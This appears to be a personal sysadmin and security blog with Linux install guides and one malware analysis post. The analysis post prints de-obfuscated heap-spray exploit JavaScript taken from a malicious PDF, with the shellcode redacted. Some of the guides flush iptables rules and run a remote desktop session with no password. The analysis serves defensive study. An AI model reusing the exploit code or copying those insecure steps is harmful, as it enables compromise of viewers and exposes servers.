Software Engineering & Security Notes

Recent Updates Toggle Comment Threads | Keyboard Shortcuts

• 

  Nickolas Golubev 11:15 pm on January 27, 2014 Permalink | Reply
  Tags: admin ( 2 ), linux, open source, rdp, rhel ( 2 ), rhel6 ( 2 ), xrdp   

  Installing XRDP onto RHEL6 / Red Hat Enterprise Server 

  I was told by a senior colleague that XRDP (http://sourceforge.net/projects/xrdp/) is a great way to remotely connect to your Linux servers through windows remote desktop protocol. It extends an XOrg session through through VNC and then the RDP. Here is how you can get it working on RHEL6!
  
sudo yum install gcc make pam-devel openssl-devel vnc-server autoconf automake libtool libX11-devel libXfixes-devel


wget http://downloads.sourceforge.net/project/xrdp/xrdp/0.6.1/xrdp-v0.6.1.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fxrdp%2F%3Fsource%3Ddirectory&ts=1390846301&use_mirror=softlayer-ams


tar zxvf xrdp-v0.6.1.tar.gz
cd xrdp-v0.6.1
./bootstrap
./configure
make
sudo make install

  Add user(s) to the 100, “users” group to allow them to login via RDP
  
sudo nano /etc/group

  Edit iptables to permit inbound RDP
  
sudo nano /etc/sysconfig/iptables

  add
  
-F INPUT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 3389 -j ACCEPT


sudo service iptables restart

  Make it a little more secure by enabling 128 bit 2-way encryption
  
sudo nano /etc/xrdp/xrdp.ini

  Change crypt_level=low to crypt_level=high

  Generate a new RSA key
  
sudo /usr/local/bin/xrdp-keygen xrdp auto

  Start XRDP up and then try and connect to it using remote desktop client in Windows
  
sudo /etc/xrdp/xrdp.sh start

  Finally make XRDP auto start as a service.
  
sudo ln -s /etc/xrdp/xrdp.sh /etc/init.d/xrdp
sudo chkconfig --add xrdp
sudo chkconfig xrdp on
sudo service xrdp start


   

  Reply Cancel reply

  Required fields are marked *

  Name *

  Email *

  Website

   −  6  =  3

  Current ye@r *

  Leave this field empty

• 

  Nickolas Golubev 7:36 pm on December 27, 2013 Permalink | Reply  

  Installing XSpice (xf86-video-qxl-0.1.0) onto Redhat Enterprise Server 6 RHEL6 

  I have been working on getting XSpice enabled on x64 RHEL6. XSpice is an X11 driver that allows for remote connections much like VNC. This install is not trivial as XSpice is still an experimental product so there are only packaged / repoed versions of it for Fedora Core.

  Firstly RHEL optional RPMS must be enabled

  #nano /etc/yum.repos.d/redhat.repo

  enable rhel-6-server-optional-rpms

  Now install a bunch of packages.

  #yum install kdebase
#yum install xorg*
#yum install spice-server-devel
#yum install python-argparse
#yum install xorg-x11-util-macros*
#yum install spice-server-devel spice-protocol

  Now download / make / install randr:

  #wget http://cgit.freedesktop.org/xorg/driver/xf86-video-qxl/snapshot/wip/randr12.v1.tar.gz
#tar zxvf randr12.v1.tar.gz
#cd wip/randr12.v1
#./autogen.sh
#./configure
#make install

  Now get xf86-video-qxl-0.1.1 and xf86-video-qxl-0.1.0

  #wget http://cgit.freedesktop.org/xorg/driver/xf86-video-qxl/snapshot/xf86-video-qxl-0.1.1.tar.gz
#tar zxvf xf86-video-qxl-0.1.1.tar.gz

  #wget http://cgit.freedesktop.org/xorg/driver/xf86-video-qxl/snapshot/xf86-video-qxl-0.1.0.tar.gz
#tar zxvf xf86-video-qxl-0.1.0.tar.gz

  Compile the 0.1.0 version (the 0.1.1 would not configure / make due to a library dependency issue with RHEL6)

  #cd xf86-video-qxl-0.1.0
#autoreconf -i && ./configure --enable-xspice && make
#make install
#cp src/.libs/spiceqxl_drv.so /usr/lib64/xorg/modules/drivers/

  I copied the XSpice startup script and X11 config from xf86-video-qxl-0.1.1 because it has more startup options yet is backwards compatible with xf86-video-qxl-0.1.0

  #cd ..
#cp xf86-video-qxl-0.1.1/scripts/Xspice /home/normal_user_account/
#cp xf86-video-qxl-0.1.1/examples/spiceqxl.xorg.conf.example /etc/X11/spiceqxl.xorg.conf
chown normaluser.normaluser /home/normal_user_account/Xspice


  Now add iptable rules if you have iptables enabled

  #nano /etc/sysconfig/iptables
-F INPUT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 5900:5950 -j ACCEPT
#service iptables restart

  Now drop back to a normal, non-root account and run the XSpice script:
  
#exit
#cd ~
#./Xspice --port 5903 :4.0 --xsession /usr/bin/startkde --disable-ticketing

  I am starting a KDE session instead of a GNOME because there seems to be a bug preventing GNOME from working with Xspice (https://bugzilla.redhat.com/show_bug.cgi?id=970622)

  Warning:
  Do not run this as root! there is no password and it should just be used for testing unless you enable stronger authentication.

  You can now connect using the virt-viewer client (http://www.spice-space.org/download.html)

   
• 

  Nickolas Golubev 10:35 pm on December 5, 2013 Permalink | Reply
  Tags: admin ( 2 ), java, jdk, maven, rhel ( 2 ), rhel6 ( 2 )   

  Installing MAVEN on Red Hat Enteprise Server 6.x (rhel6) 

  Just had to install maven on a rhel6 box… not sure why it is not in the yum / up2date repo.

  First you need JDK7.x:

  get it at: http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

  “Linux x64 116.91 MB jdk-7u45-linux-x64.rpm”

  install the RPM using

  rpm -Uvh jdk-7u45-linux-x64.rpm

  then remove openJRE from the alternatives list:

  alternatives --list java
alternatives --remove java /usr/lib/jvm/jre-1.7.0-openjdk.x86_64/bin/java

  Double check the java version:

  java -version

  It should say:
  java version "1.7.0_45"
Java(TM) SE Runtime Environment (Build 1.7.0_45-b18)
  …

  Now go to the Maven site:

  and get the latest version of 2.x or 3.x (using 2.2.1 here)

  wget http://apache.osuosl.org/maven/maven-2/2.2.1/binaries/apache-maven-2.2.1-bin.tar.gz

  and install:
  tar zxvf apache-maven-2.2.1-bin.tar.gz
mv apache-maven-2.2.1 /opt/
ln -s /opt/apache-maven-2.2.1 /opt/maven
nano /etc/profile.d/custom.sh

  paste this:

  #!/bin/bash
export JAVA_HOME=/usr/java/latest
export MAVEN_HOME=/opt/maven
export M2_HOME=$MAVEN_HOME
export PATH=$PATH:$MAVEN_HOME/bin

  -save (ctrl-o)

  -new session

  test:

  mvn --version

  Should say:
  
Apache Maven 2.2.1 …

   
• 

  Nickolas Golubev 10:27 pm on December 4, 2013 Permalink | Reply
  Tags: import, move, wordpress   

  Just moved the whole site from blogger.com to a wordpress site on my own hosting provider. Seems like a smooth transition!

   
• 

  Nickolas Golubev 3:02 am on March 6, 2013 Permalink | Reply  

  De-Crappify Ubuntu 12.10 (Quantal Quetzal) and remove Unity / Lenses / Amazon / Etc… 

  I have not used Ubuntu in a couple of versions and just installed Ubuntu 12.10 (Quantal Quetzal) i386 as a fresh install.

  I was mortified by the amount of junk bundled with this new version including Amazon shopping ad integration. Check out http://yro.slashdot.org/story/12/09/24/1446220/shuttleworth-trust-us-were-trying-to-make-shopping-better for more info on Ubuntu’s take on this.

  Long story short, it had to be purged!

  Here is the script (to be run as root) I came up with to remove all the new junk and install back GNOME.

  
#!/bin/bash
apt-get --yes purge gnome-control-center-signon
apt-get --yes purge unity unity-2d unity-2d-places unity-2d-panel unity-2d-spread
apt-get --yes purge unity-asset-pool unity-services unity-lens-* unity-scope-*
apt-get --yes purge liboverlay-scrollbar*
apt-get --yes purge appmenu-gtk appmenu-gtk3 appmenu-qt
apt-get --yes purge firefox-globalmenu thunderbird-globalmenu
apt-get --yes purge unity-2d-common unity-common
apt-get --yes purge libunity-misc4 libunity-core-5*
apt-get --yes purge ubuntuone-client python-ubuntuone-storage*
add-apt-repository ppa:gnome3-team/gnome3 && apt-get -f update
apt-get --yes -f install gnome-shell gnome-tweak-tool gnome-session-fallback
rm -rf /usr/share/applications/ubuntu-amazon-default.desktop
rm -rf /usr/share/applications/UbuntuOneMusiconeubuntucom.desktop

  Secondly to remove the Guest login and Remote login options from the login screen (a security issue in my opinion) run this:
  
#!/bin/bash
/usr/lib/lightdm/lightdm-set-defaults --allow-guest false --show-remote-login false

  And now you have a pretty decent new version of Ubuntu that is not sending your personal data back to Amazon.

   
• 

  Nickolas Golubev 10:59 pm on January 28, 2013 Permalink | Reply  

  Decoding a PDF Virus E-Mail 

  Today I received a malicious email via gmail.

  Title: “Check this. It might be useful for u.”
  From: XXXX@aol.com via mx.aol.com 11:55 AM (2 hours ago) to Nick

  With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

  The email came from a someone who must have had me on their address book as I communicated with them previously years ago.

  Of course I had to investigate and uploaded the pdf to jeek.org for further analysis.

  http://jsunpack.jeek.org/?report=4696a30d0b4b840770048971815fa6f85840a960

  The PDF contained a hidden javascript package which was further obfuscated.

  After manually de-obfuscating the code I came up with:

  var encoded = "a3tf31jre0........." (redacted)
var decode1 = encoded.replace(/a3tf31jre/g,"%");
var decoded = unescape(decode1);

  The encoded string breaks out to:

  var j_IgC = [31, 31, 15, 23];

function _k_m()
{
return app;
}

function _b_(xVgFqV)
{
var ___N = "";
___N = unescape(xVgFqV);
return ___N;
}

function get_ver()
{
var ver = _k_m().viewerVersion.toString();
ver = ver.replace(".", "");
while (ver.length < 4)
{
ver += "0";
}
ver = parseInt(ver, 10);
return ver;
}

function make_block(xVgFqV, len)
{
while (xVgFqV.length * 2 < len)
{
xVgFqV += xVgFqV;
}
xVgFqV = xVgFqV.substring(0, len/ 2);
return xVgFqV;
}

  function heap_spray3(scode)
{
scode = _b_(scode);
var sclen = scode.length * 2;
var fasdds = _b_("%u9090");
var spray = make_block(fasdds,0x2000 - sclen);
var block = scode + spray;
block = make_block(block,0x80000 - 0x40);
for (var i = 0;i<0x190;i ++)
{
j_IgC[i] = block.substr(0,block.length - 1) + fasdds;
}
return;
}

function make_str(xVgFqV,len)
{
while (xVgFqV.length < len){ xVgFqV += xVgFqV; }
xVgFqV = xVgFqV.substring(0, len);
return xVgFqV;
}

function num2hex(num)
{
var xVgFqV = num.toString(16);
var len = xVgFqV.length;
var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
return ret;
}

function str2uni(xVgFqV)
{
var ret = "";
for (var i = 0;i < xVgFqV.length;i += 2)
{
ret += "%u";
ret += num2hex(xVgFqV.charCodeAt(i + 1));
ret += num2hex(xVgFqV.charCodeAt(i));
}
return ret;
}

function hex2str(hex)
{
var ret = "";
for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
{
var tiff = "SUkqADggAABB";
var nops = make_str("QUFB",0x2ae8);
var start "..."; (redacted)
var foot = "";
var sc_hex = "";

if (ver < 8201)
{
foot = "..."; (redacted)
var sc_hex = "..."; (redacted)
}
else
{
foot = "..."; (redacted)
sc_hex = "..."; (redacted)
}

if (foot.length)
{
var ret = [tiff,nops,start,foot].join("");
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
heap_spray3(scode);
pwzh6lr.rawValue = ret;
}
}
}

  After the PDF viewer is “heap sprayed” ( http://en.wikipedia.org/wiki/Heap_spraying ) the exploit payload that is injected goes out to download http://earthexplore.com/PDFS/XXXXXXX.exe (redacted). I have not analyzed the executable it self but would imagine that it is some sort of a trojan.

   
• 

  Nickolas Golubev 6:54 pm on June 23, 2011 Permalink | Reply  

  The dangers of stovepipe security 

  The recent events with Sony http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.html have got me thinking about the dangers of “stovepipe” security… (http://en.wikipedia.org/wiki/Stovepipe_%28organisation%29)

  A stovepipe is an organizational structure hinders cross organizational communications and collaboration.  It can be theorized that the different  sub companies / groups within Sony worked in a stove pipe security type model. There was likely no over-arching security guidance / policy or common, authoritative security department.

  Large enterprises should always have a clear and common security policy and a common corporate security department. Information about attacks and fixes at one department should be shared with others in an effort to combat any further damage.

  Lastly an organization should follow standard security standards like the ISO 27002  (http://en.wikipedia.org/wiki/ISO/IEC_27002) Why re-invent the wheel when proven, practical methodology already exists?

   
• 

  Nickolas Golubev 7:17 pm on April 7, 2011 Permalink | Reply  

  Sometimes I feel like this is very true! 

  

  Ideally a well structured project would define scope and architecture before any code has been written. In reality cowboy coding happens more often then not.

  David is discussing. Toggle Comments

   
  • 

    David 5:11 am on April 14, 2011 Permalink | Reply

    You should get some cowboy boots.

• 

  Nickolas Golubev 8:19 pm on March 29, 2011 Permalink | Reply  

  MySQL website comprimised by blind SQL injection attack 

  I found this new story to be quite ironic: http://www.h-online.com/security/news/item/MySQL-allegedly-hacked-via-SQL-injection-1216281.html

  Apparently the public facing mysql.com site was attacked through a blind SQL injection attack: ( https://secure.wikimedia.org/wikipedia/en/wiki/SQL_injection#Blind_SQL_injection ) and the internal database structure published by the hacker as proof.

  It really shows why Injection is #1 on the OWASP Top 10 list ( http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project )  when a large SQL vendor (Owned by Oracle) can’t even protect  against Blind SQL Injection on their public facing site!

   
• 

  Nickolas Golubev 4:55 pm on March 24, 2011 Permalink | Reply  

  Cryptic Hibernate Reverse Engineering Wizard Error 

  Today I tried to create some POJOs / HBM files automatically from a legacy database using the Netbeans 6.8 Hibernate tools. Everything was going great before and I could connect to the database using my hibernate.cfg.xml file in the actual code but then I ran the “Hibernate Reverse Engineering Wizard”…

  Problem #1: It could not find my hibernate.cfg.xml and I had to copy this file into my actual package directory where I was trying to generate the files.

  Problem #2: Okay the hibernate.cfg.xml was now read but a new error showed up “Database drivers are not added to the project classpath. Go to project properties to add database library.”

  After some digging around I finally figured out that the error is somewhat cryptic. The Microsoft SQL Server JDBC 4 library was actually in the path but the real problem was the connection string and the lack of specifying a connection driver class.
  
  
  Previously I had:

  name="hibernate.connection.url">

  jdbc:sqlserver://MY_SERVER:1433

  This had to be changed to:

  com.microsoft.sqlserver.jdbc.SQLServerDriver

  jdbc:sqlserver://MY_SERVER:1433;databaseName=MY_DATABASE

  
  Now the wizard did not error out any-more, success!
  
  
  Problem #3: While the wizard no longer errored out it also did not show a list of available tables, no matter though it did generate a very generic hibernate.reveng.xml file. The “New Hibernate Mapping Files and POJOs From Database” wizard accepted this file and created POJOs / HBM for every single table in the database. The only issue here was that I had to manually delete the default sys. schema tables which were of no use to me.